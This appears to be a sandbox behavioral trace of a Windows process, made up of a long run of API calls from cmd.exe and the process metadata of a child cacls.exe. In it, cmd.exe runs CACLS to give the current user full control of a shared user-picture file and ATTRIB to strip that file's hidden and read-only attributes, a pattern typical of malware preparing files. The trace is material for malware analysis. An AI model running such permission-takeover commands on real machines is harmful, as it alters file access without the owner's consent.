(_String1="PROMPT", _String2="RANDOM") returned -2 [0187.942] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.942] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.942] GetEnvironmentStringsW () returned 0x2d2458* [0187.943] FreeEnvironmentStringsW (penv=0x2d2458) returned 1 [0187.943] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.943] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.943] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.943] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.943] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.943] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.943] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.943] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.943] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f550 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.943] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f550, lpFilePart=0x26f54c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f54c*="Desktop") returned 0x18 [0187.943] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.943] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2cc | out: lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2cc | out: 
lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2cc | out: lpFindFileData=0x26f2cc) returned 0x2d0ae8 [0187.944] FindClose (in: hFindFile=0x2d0ae8 | out: hFindFile=0x2d0ae8) returned 1 [0187.944] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.944] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.944] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.944] GetEnvironmentStringsW () returned 0x2d0308* [0187.945] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.945] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.945] GetConsoleOutputCP () returned 0x1b5 [0187.945] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.945] GetUserDefaultLCID () returned 0x409 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f690, cchData=128 | out: lpLCData="0") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f690, cchData=128 | out: lpLCData="0") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f690, cchData=128 | out: lpLCData="1") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: 
lpLCData="Tue") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.946] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.946] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.947] GetConsoleTitleW (in: lpConsoleTitle=0x2c09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.948] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.948] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.949] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.949] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.949] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.949] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.949] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.949] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.950] _wcsicmp (_String1="REM", 
_String2="CACLS") returned 15 [0187.950] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.952] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.952] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.952] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.952] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.952] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.952] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.952] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.955] GetConsoleTitleW (in: lpConsoleTitle=0x26f324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.955] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.955] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.955] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.955] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.955] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.955] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.955] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.955] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.955] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.955] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.955] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.955] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.955] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0187.955] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.955] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.956] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.956] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.956] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.956] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.956] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.956] _wcsicmp 
(_String1="CACLS", _String2="CD") returned -3 [0187.956] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.956] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.956] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.956] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.956] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.956] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.956] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.956] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.957] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.957] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.957] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.957] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.957] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.957] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.957] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.957] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.957] 
_wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.957] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.957] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.957] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.957] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.957] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.957] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.957] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.957] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.957] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.957] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.957] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.957] SetErrorMode (uMode=0x0) returned 0x0 [0187.957] SetErrorMode (uMode=0x1) returned 0x0 [0187.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2d1e98, lpFilePart=0x26ee44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee44*="Desktop") returned 0x18 [0187.957] SetErrorMode (uMode=0x0) returned 0x1 [0187.958] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.958] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.979] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2d2180 [0187.979] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0187.979] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0187.979] GetLastError () returned 0x2 [0187.980] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2d2180 [0187.980] FindClose (in: hFindFile=0x2d2180 | out: hFindFile=0x2d2180) returned 1 [0187.980] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.980] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.980] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.980] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f008 | out: lpAttributeList=0x26ef40, lpSize=0x26f008) returned 1 [0187.980] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef40, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f000, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef40, lpPreviousValue=0x0) returned 1 [0187.980] GetStartupInfoW (in: lpStartupInfo=0x26eefc | out: lpStartupInfo=0x26eefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.980] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.981] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26efe8*(hProcess=0x50, hThread=0x4c, dwProcessId=0x8d0, dwThreadId=0x868)) returned 1 [0187.983] CloseHandle (hObject=0x4c) returned 1 [0187.983] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.983] GetEnvironmentStringsW () returned 0x2d0308* [0187.983] FreeEnvironmentStringsW (penv=0x2d0308) returned 1 [0187.983] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0188.020] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eedc | out: lpExitCode=0x26eedc*=0x0) returned 1 [0188.020] CloseHandle (hObject=0x50) returned 1 [0188.020] _vsnwprintf (in: _Buffer=0x26f024, _BufferCount=0x13, 
_Format="%08X", _ArgList=0x26eee8 | out: _Buffer="00000000") returned 8 [0188.020] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.020] GetEnvironmentStringsW () returned 0x2d2410* [0188.020] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.020] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.020] GetEnvironmentStringsW () returned 0x2d2410* [0188.020] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.020] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef40 | out: lpAttributeList=0x26ef40) [0188.020] GetConsoleTitleW (in: lpConsoleTitle=0x26f324, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.021] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.021] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0188.021] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.021] GetLastError () returned 0x2 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.021] GetLastError () returned 0x2 [0188.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2ce4d8 [0188.021] 
FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0188.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0xffffffff [0188.022] GetLastError () returned 0x2 [0188.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebc0) returned 0x2ce4d8 [0188.022] FindClose (in: hFindFile=0x2ce4d8 | out: hFindFile=0x2ce4d8) returned 1 [0188.022] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0188.022] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0188.022] GetConsoleTitleW (in: lpConsoleTitle=0x26f0b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0188.022] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f008 | out: lpAttributeList=0x26ef40, lpSize=0x26f008) returned 1 [0188.022] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef40, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f000, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef40, lpPreviousValue=0x0) returned 1 [0188.022] GetStartupInfoW (in: lpStartupInfo=0x26eefc | out: lpStartupInfo=0x26eefc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0188.022] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0188.022] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26ef9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26efe8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"", lpProcessInformation=0x26efe8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xe00, dwThreadId=0x95c)) returned 1 [0188.024] CloseHandle (hObject=0x50) returned 1 [0188.024] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0188.024] GetEnvironmentStringsW () returned 0x2d2410* [0188.024] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.024] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0188.057] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26eedc | out: lpExitCode=0x26eedc*=0x0) returned 1 [0188.057] CloseHandle (hObject=0x4c) returned 1 [0188.057] _vsnwprintf (in: _Buffer=0x26f024, _BufferCount=0x13, _Format="%08X", _ArgList=0x26eee8 | out: _Buffer="00000000") returned 8 [0188.057] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0188.057] GetEnvironmentStringsW () returned 0x2d2410* [0188.057] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.057] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0188.058] GetEnvironmentStringsW () returned 0x2d2410* [0188.058] FreeEnvironmentStringsW (penv=0x2d2410) returned 1 [0188.058] DeleteProcThreadAttributeList (in: 
lpAttributeList=0x26ef40 | out: lpAttributeList=0x26ef40) [0188.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.058] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.058] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.058] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.058] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.058] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.058] SetConsoleInputExeNameW () returned 0x1 [0188.058] GetConsoleOutputCP () returned 0x1b5 [0188.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.058] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.058] exit (_Code=0) Process: id = "401" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c20" os_pid = "0x8d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "400" os_parent_pid = "0xec8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27266 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27267 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27268 start_va = 0x40000 end_va = 0x40fff 
